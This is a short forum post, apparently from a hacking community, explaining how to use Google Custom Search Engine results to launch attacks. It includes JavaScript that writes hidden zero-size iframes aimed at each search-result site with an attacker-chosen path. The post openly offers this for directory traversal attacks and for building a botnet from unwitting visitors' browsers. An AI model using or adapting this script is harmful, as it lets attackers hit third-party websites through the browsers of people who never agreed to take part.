Search the Community

Normally a user uses Google to search and this results are showned in a page with 10 results to a maximum of 1000 results. Since anyone uses Google to search they have release a way to narrow the results down to a few domains. This is called CSE (Custom Search Engine). Recently Google have release a method to get results using CSE in a whitelabel basis. This means that the results won't show any reference to Google and a user can retrieve up to 10 results. This page results delivers 10 links from the search engine using a keyword you want. Instead of showing the results, the webmaster can convert the results to actionable items. For example: a iframe. This can be used to make File Path Traversal attacks, Directory Traversal attacks or build your own botnet by gathering information using dorks and creating custom HTTP attacks. So, let start. Requirements Google API account Google CSE account Some coding... Start by creating a CSE engine with the sites: "*.com*" and get the search engine code "cx=...something goes here". Open notepad and paste this code > <script> var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { var myObj = JSON.parse(this.responseText); document.write('<center><table><tr><td>'); for (x in myObj.items) { document.write('<iframe src="'+ myObj.items[x].link +'/YOUR-ACTIONABLE-DORK-GOES" height="0" width="0" frameborder="0">');} }; xmlhttp.open("GET", "[Hidden Content]", true); xmlhttp.send(); } </script> Change the document.write code to your hack. Change key to yours. Change cx to your search engine.